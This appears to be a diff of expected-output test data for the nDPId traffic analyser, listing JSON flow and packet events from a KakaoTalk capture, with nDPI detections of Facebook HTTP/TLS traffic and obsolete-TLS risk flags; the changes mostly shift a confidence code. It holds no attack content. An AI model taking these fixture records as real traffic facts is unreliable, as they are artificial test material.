00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} 
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
-01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} 
@@ -180,59 +180,59 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} 
